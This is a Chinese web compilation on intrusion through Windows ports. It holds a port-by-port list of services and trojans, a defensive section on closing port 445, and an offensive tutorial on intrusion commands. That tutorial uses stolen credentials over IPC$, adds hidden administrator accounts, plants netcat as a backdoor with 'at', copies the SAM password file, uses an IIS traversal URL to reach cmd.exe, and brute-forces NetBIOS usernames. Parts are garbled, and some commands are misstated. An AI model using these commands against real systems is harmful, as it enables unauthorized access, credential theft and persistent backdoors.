445端口入侵详解

篇一：黑客常用入侵端口详解

常见的入侵端口：

端口：0

服务：Reserved

说明：通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。

(我被这样入侵过,一般感觉计算机运行慢或是你感觉有问题存在,先去查ip,如果有入侵赶紧断掉网,如果晚了他可能就会盗取你很多帐号或资料.)

-

端口：1

服务：tcpmux

说明：这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。

-

端口：7

服务：Echo

说明：能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。 -

端口：19

服务：Character Generator

说明：这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。

-

端口：21

服务：FTP

说明：FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。

-

端口：22

服务：Ssh

说明：PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。

-

端口：23

服务：Telnet

说明：远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术，入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。

-

端口：25

服务：SMTP

说明：SMTP服务器所开放的端口，用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭，他们需要连接到高带宽的E-MAIL服务器上，将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。

-

端口：31

服务：MSG Authentication

说明：木马Master Paradise、Hackers Paradise开放此端口。

-

端口：42

服务：WINS Replication

说明：WINS复制

-

端口：53

服务：Domain Name Server（DNS）

说明：DNS服务器所开放的端口，入侵者可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其他的通信。因此防火墙常常过滤或记录此端口。

-

端口：67

服务：Bootstrap Protocol Server

说明：通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们，分配一个地址把自己作为局部路由器而发起大量中间人（man-in-middle）攻击。客户端向68端口广播请求配置，服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

-

端口：69

服务：Trival File Transfer

说明：许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。 -

端口：79

服务：Finger Server

说明：入侵者用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其他机器Finger扫描。

-

端口：80

服务：HTTP

说明：用于网页浏览。木马Executor开放此端口。

-

端口：99

服务：metagram Relay

说明：后门程序ncx99开放此端口。

-

端口：102

服务：Message transfer agent(MTA)-X.400 over TCP/IP

说明：消息传输代理。

-

端口：109

服务：Post Office Protocol -Version3

说明：POP3服务器开放此端口，用于接收邮件，客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个，这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。

-

端口：110

服务：SUN公司的RPC服务所有端口

说明：常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等 -

端口：113

服务：Authentication Service

说明：这是一个许多计算机上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器，尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，将会看到许多这个端口的连接请求。记住，如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。 -

端口：119

服务：Network News Transfer Protocol

说明：NEWS新闻组传输协议，承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制，只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送SPAM。 -

端口：135

服务：Location Service

说明：Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时，它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗？什么版本？还有些DOS攻击直接针对这个端口。

-

端口：137、138、139

服务：NETBIOS Name Service

说明：其中137、138是UDP端口，当通过网上邻居传输文件时用这个端口。而139端口：通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。

-

端口：143

服务：Interim Mail Access Protocol v2

说明：和POP3的安全问题一样，许多IMAP服务器存在有缓冲区溢出漏洞。记住：一种LINUX蠕虫（admv0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后，这些漏洞变的很流行。这一端口还被用于IMAP2，但并不流行。

-

端口：161

服务：SNMP

说明：SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中，通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。

-

端口：177

服务：X Display Manager Control Protocol

说明：许多入侵者通过它访问X-windows操作台，它同时需要打开6000端口。

-

端口：389

服务：LDAP、ILS

说明：轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。 -

端口：443

服务：Https

说明：网页浏览端口，能提供加密和通过安全端口传输的另一种HTTP。

-

端口：456

服务：[NULL]

说明：木马HACKERS PARADISE开放此端口。

-

端口：513

服务：Login,remote login

说明：是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。

-

端口：544

服务：[NULL]

说明：kerberos kshell

-

端口：548

服务：Macintosh,File Services(AFP/IP)

说明：Macintosh,文件服务。

-

端口：553

服务：CORBA IIOP （UDP）

说明：使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。

-

端口：555

服务：DSF

说明：木马PhAse1.0、Stealth Spy、IniKiller开放此端口。

-

端口：568

服务：Membership DPA

说明：成员资格 DPA。

-

端口：569

服务：Membership MSN

说明：成员资格 MSN。

-

端口：635

服务：mountd

说明：Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的，但是基于TCP的mountd有所增加（mountd同时运行于两个端口）。记住mountd可运行于任何端口（到底是哪个端口，需要在端口111做portmap查询），只是Linux默认端口是635，就像NFS通常运行于2049端口。

-

端口：636

服务：LDAP

说明：SSL（Secure Sockets layer）

-

端口：666

服务：Doom Id Software

说明：木马Attack FTP、Satanz Backdoor开放此端口

-

端口：993

服务：IMAP

说明：SSL（Secure Sockets layer）

-

端口：1001、1011

服务：[NULL]

说明：木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。 -

端口：1024

服务：Reserved

说明：它是动态端口的开始，许多程序并不在乎用哪个端口连接网络，它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器，打开Telnet，再打开一个窗口运行natstat -a 将会

篇二：445端口

445端口，一个既让人爱，又招人恨的端口，有了它，网民们可以在局域网中轻松访问各种共享文件夹或共享打印机，但正因为有了它，Internet上 的“恶人”们才有了“可乘之机”，他们能躲在Internet上的“阴暗角落”里，偷偷共享你的硬盘，甚至会在悄无声息中，将你的硬盘格式化掉！面对如此 猖獗、疯狂的攻击，你能做的，就是运用自己的智慧，与Internet上的“大恶人”们，“决战”于445端口之巅！为了助你“敲”开胜利之门，本文特“ 传授”你如下决战秘诀，仅供参考。

端口排除法

单击“开始” →“设置” →“网络和拨号连接” →“Internet连接”，选中“属性”选项，弹出Internet连接属性窗口；

打开“常规”标签页面，选中“Internet协议（TCP/IP）”，单击“属性”，再单击属性页面中的“高级”按钮，打开高级TCP/IP设置窗 口，选中“选项”标签，并在该标签页面的“可选的设置”项中，将“TCP/IP筛选”选中，同时单击“属性”，打开设置窗口（如图1）；

图1

由于445端口属于一种TCP端口，你可以在对应“TCP端口”的设置项处，将“只允许”项选中，激活下面的“添加”按钮，单击该按钮，在其后打开的“ 添加筛选器”窗口中，将必须用到的几个服务端口号码，都添加进来，而将用不到的445端口号码排除在外，设置完毕后，单击“确定”按钮，就可以让设

置生效 了。

服务关闭法

考虑到文件夹或打印机共享服务，才会利用到445端口，因此直接将文件夹或打印机共享服务停止掉，同样也能实现关闭445端口的目的：

按前面方法，打开“Internet连接”属性窗口；在“常规”标签页面中，将“此连接使用下列选定的组件”列表框中的“Microsoft网络的文件或打印机共享”选项取消，再单击“确定”，重新启动系统就可以了。

当然，你也可以利用本地安全设置中的“用户权利指派”功能，指定

Internet上的任何用户都无权访问本地主机，从而实现间接关闭445端口的目的：

依次单击“开始” →“程序” →“管理工具” →“本地安全设置”选项，展开“安全设置” →“本地策略” →“用户权利指派”文件夹，双击“拒绝从网络访问这台计算机”（如图2）；继续单击“添加”，选中“everyone”选项，再单击“添加”、“确定”， 这样任何一位外来访问者，都无法从网络访问到本地主机了。不过该方法，“打击”范围比较广，造成的后果是无论是“敌人”，还是“良民”，都无法访问到共享 资源了，因此这种方法，适宜在保存有绝对机密信息的服务器中使用。

图2

注册表设置法

这种方法，是通过修改注册表，将用于文件夹或打印机共享的服务禁止掉，具体操作方法为：

依次展开注册表分支

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT

\Parameters，在右边窗口中新创建“SMBDeviceEnabled”双字节值，再将其设置为“0”，然后重新启动一下系统就OK了。

防火墙设置法

这种方法，是利用防火墙的安全过滤规则，将通过445端口的任何数据包拦截下来。比方说，启动“KV3000的反黑王防火墙”，单击“防火墙控制”处的“规则设置”按钮，再单击“增加规则”，打开图3界面；

在该界面的名称设置项处，输入“关闭445端口”，在“网络条件”处，选中“接受数据包”，并将对方IP地址设置为“任何地址”，将本地IP地址设置为“指定本地IP地址”，然后输入本地主机的IP地址。

单击“TCP”标签，并在本地端口处，选中“指定端口”，并输入“445”；在“对方端口”处，选中“任一端口”选项。

图3

在“规则对象”处，选中“系统访问网络时”，在“当所有条件满足时”处，选中“拦截”，最后单击“确定”，完成安全过滤规则的创建。返回到反黑王防火墙 的规则设置窗口，选中刚刚创建好的“关闭445端口”的过滤规则，如此一来，来自445端口的各种非法入侵，都会被反黑王防火墙自动拦截。

组策略设置法

依次单击“开始”→“程序”→“管理工具”→“本地安全策略”，打开一个本地组策略编辑界面，右击“IP安全策略，在本地机器”，执行“创建IP安全策略”命令，弹出一个创建向导界面；

单击“下一步”，在“名称”处，输入“关闭445端口”，再单击“下一步”，选中“激活默认响应规则”，其余参数均设置为默认值，就可以完成新安全策略 的创建操作了；单击“添加”，继续单击“下一步”，选中“此规则不指定隧道”，然后将“网络类型”设置为“所有网络连接”，接着选中“Windows 2000默认值??”选项，再单击“下一步”，在IP筛选器列表界面中单击“添加”，将IP筛选器名称设置为“阻止445端口”，单击“添加”，再将源地 址设置为“任何IP地址”，将目标地址设置为“我的IP地址”，继续单击“下一步”，选中“TCP”；

在随后的窗口中，选中“从 任意端口到此端口”，并输入“445”，最后依次单击“完成”、“关闭”，返回到IP筛选器列表页面；然后选中“阻止445端口”筛选器，单击“下一步 ”，选中“拒绝”选项，再依次单击“下一步”、“完成”按钮，就能将“阻止445端口”的筛选器，添加到名为“关闭445端口”的IP安全策略中了，再单 击“确定”按钮，返回到“本地安全设置”窗口中。

最后，在“本地安全设置”窗口中，右击“关闭445端口”策略，从弹出的快捷菜单中，依次单击“所有任务”/“指派”命令，就能使上述设置生效了。

篇三：网络入侵命令详解

网络入侵命令详解

1：NET

只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！

这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1

net use \\127.0.0.1\ipc$ 123456 /user:hbx null密码为空

退出的命令是

net use \\127.0.0.1\ipc$ /删除

--------------------------------

net share是查看主机共享资源我们用它建一个秘密共享目录吧net share me=c:\winnt\system32 这样这个机器就有了一个名为me的共享目录，而打开它就是winnt下的system32目录，如果你用win2000的系统就知这个目录有多重要了，如果不想要也好办net share me /删除 呵呵，没有了，是不是很方便的啊。

---------------------- ---------------------- ----------------------

下面的操作你必须登陆后才可以用.登陆的方法就在上面.

---------------------- ---------------------- ----------------------

下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户.

我们加一个heibai的用户密码为lovechina

net user heibai lovechina /add

只要显示命令成功，那么我们可以把他加入Administrator组了.

net localgroup Administrators heibai /add

----------------------

这里是讲映射对方的C盘，当然其他盘也可以，只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.

net use z:\\127.0.0.1\c$

----------------------

net start telnet

这样可以打开对方的TELNET服务.

----------------------

这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。

net user guest /active:yes

----------------------

net user guest /active:no这样这个guest的用户就又被禁用了

----------------------

这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！

net user guest lovechina

有人问到提高权限的问题 下面就解决下

net localgroup administrators guest /add

将guest变为administrator

net命令果然强大啊！ net view命令看对方开了共享

-------------------------------------------------------------------------------------------------------------

net user是查看所有用户列表，看看哪个用户是和你一样偷跑进来的，给他名给删掉，让他美，

net user 用户名 /删除哈哈,他没有了,管他什么是不是管理员呢,不过我们还是查一下管理员组有什么用户吧,这样的用户才对我们有用嘛 net localgroup administrators就列出管理员组成员了,再查看一下administrator这个用户，因为这个是创建系统时建出来的，所以要看看他的系统是什么时间创建出来的

net user administrator，然后再查看别的管理员用户是什么时间创建的，如果相差太远，那可能是被别人偷偷跑来偷建的，一律del，安全第一哦................

---------------------------------------------------------------------------------------------------------------------------

2:at

一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？

那么需要用AT命令，这里假设你已经登陆了那个服务器。

----------------------

你首先要得到对方的时间，

net time \\127.0.0.1

----------------------

将会返回一个时间，这里假设时间为12:1，现在需要新建一个作业，其ID=1

at \\127.0.0.1 12:3 nc.exe

这里假设了一个木马，名为NC.EXE，这个东西要在对方服务器上.

这里介绍一下NC，NC是NETCAT的简称，为了方便输入，一般会被改名.它是一个TELNET服务，端口为99.

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

-----------------------------------------------------

at命令功能强大,下面可以打个比方:

C:\> AT 22:30 Start C:\prettyboy.mp3

新加了一项作业，其作业 ID = 1 [现在我们新建立了一个任务 在22:30分 系统将自动播放歌曲]

---------------------------------------------------------------------------------------------------------------------------

3:telnet

这个命令非常实用，它可以与远方做连接，不过正常下需要密码、用户，不过你给对方种了木马，直接连到这个木马打开的端口.

telnet 127.0.0.1 99

这样就可以连到对方的99端口.那你就可以在对方运行命令了，这个也就是肉鸡.

---------------------------------------------------------------------------------------------------------------------------

4:FTP

它可以将你的东西传到对方机子上，你可以去申请个支持FTP上传的空间，国内多的是，如果真的找不到，我给WWW.51.NET，不错的.当我们申请完后，...?约癋TP服务器. 在上传前需要登陆先，这里我们假设FTP服务器WWW.51.NET，用户名是HUCJS，密码是654321

ftp

他会要求输入用户，成功后会要求输入密码.

----------------------

下面先说上传，假设你需上传的文件是INDEX.HTM，它位于C:\下，传到对方D:\ get c:\index.htm d:\

假设你要把对方C盘下的INDEX.HTM，下到你的机子的D盘下

put c:\index.htm d:\

--------------------------------------------------

这里的问题是两个命令的解释正好弄反了，登陆ＦＴＰ服务器后get才是下载，而put命令是上传，这和tftp的命令正好相反，在tftp命令里get是上传put是下载，这下明白了吧，而且在ＦＴＰ服务器中不能用c:\和d:\这样来指明路径，这也是在tftp里面用的方法，FTP可不会执行的，不信你去试好了，正确应该这样上传文件put index.htm这样就足够了，装c盘根目录下的index.htm文件上传到FTP服务器的当前目录下，不喜欢就del index.htm删掉这文件，下载时先查看一下目录，dir然后看这个目录里有什么，有你要的你就get index.htm这样就把index.htm这个文件下载到你自己的c盘根目录下了。

--------------------------------------------------------------

get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm）"

这句的解释里就没有出现错误，呵呵，看来那以前的还是马虎所至吧

好了，总算找出错处了吧，再说下面吧。

---------------------------------------------------------------------------------------------------------------------------

5:copy

下面我说说怎样把本地的文件复制到对方硬盘上去， 需要建立好IPC$连接才有效。 这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下

copy index.htm \\127.0.0.1\c$\index.htm

----------------------

如果你要复制到D盘下 把C改为D， 就行了！

copy index.htm \\127.0.0.1\d$\index.htm

----------------------

如果你要把他复制到 WINNT 目录里

就要把输入

copy index.htm \\127.0.0.1\admin$\index.htm

admin$是winnt

---------------------

要把对方的文件复制过来，顺便告诉大家 NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名

---------------------- ----------------------

下面就把127.0.0.1的数据库复制到本地C盘下

copy \\127.0.0.1\admin$\repair\sam._ c:\

这个sam._这明显是NT主机的口令档，如果是win2000机器的口令文件应该是sam ---------------------------------------------------------------------------------------------------------------------------

6：set

如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！

下面是我得到的结果！我来分析它，只是找主页在那而已。

COMPUTERNAME=PENTIUMII

ComSpec=D:\WINNT\system32\cmd.exe

CONTENT_LENGTH=0

GATEWAY_INTERFACE=CGI/1.1

HTTP_ACCEPT=*/*

HTTP_ACCEPT_LANGUAGE=zh-cn

HTTP_CONNECTION=Keep-Alive

HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了

HTTP_ACCEPT_ENCODING=gzip， deflate

HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1

Os2LibPath=D:\WINNT\system32\os2\dll;

OS=Windows_NT

Path=D:\WINNT\system32;D:\WINNT

PATHEXT=.COM;.EXE;.BAT;.CMD

PATH_TRANSLATED=E:\vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot

PROCESSOR_ARCHITECTURE=x86

PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3， GenuineIntel PROCESSOR_LEVEL=6

PROCESSOR_REVISION=0303

PROMPT=$P$G

QUERY_STRING=/c+set

REMOTE_ADDR=XX.XX.XX.XX

REMOTE_HOST=XX.XX.XX.XX

REQUEST_METHOD=GET

SCRIPT_NAME=/脚本s/..％2f../winnt/system32/cmd.exe

SERVER_NAME=XX.XX.XX.XX

SERVER_PORT=80

SERVER_PORT_SECURE=0

SERVER_PROTOCOL=HTTP/1.1

SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0

SystemDrive=D:

SystemRoot=D:\WINNT

TZ=GMT-9

USERPROFILE=D:\WINNT\Profiles\Default User

windir=D:\WINNT

粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用

这个方法才能100％的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那么这就是主页的名称了。

---------------------------------------------------------------------------------------------------------------------------

7：nbtstat

如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！

现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。 命令是

nbtstat -A XX.XX.XX.XX

-A一定要大写哦。

这个我认为大不大写没有太大差别，用处还是一样的。

之后用net use \\对方IP 连接一下！

net view \\对方IP 查看对方共享文件夹

net use X: \\IP\对方共享文件 映射对方共享文件夹成为本机的X盘

这就是139端口的基本用法！不过前提是必须对方开共享！

netstat -n看看谁连接你

-----------------

下面是得到的结果。

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered

MAC Address = 00-E0-29-14-35-BA

PENTIUMII <00> UNIQUE

PENTIUMII <20> UNIQUE

ORAHOTOWN <00> GROUP

ORAHOTOWN <1C> GROUP

ORAHOTOWN <1B> UNIQUE

PENTIUMII <03> UNIQUE

INet~Services <1C> GROUP

IS~PENTIUMII...<00> UNIQUE

ORAHOTOWN <1E> GROUP

ORAHOTOWN <1D> UNIQUE

..__MSBROWSE__.<01> GROUP

粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是 <03> 的话，那他前面的就是用户. 这里的用户是PENTIUMII。 没有03说明:MAC没和IP捆在一起了

----------------------------------------------------------------------------------------------------------------------

本文来源：https://www.bwwdw.com/article/lfsb.html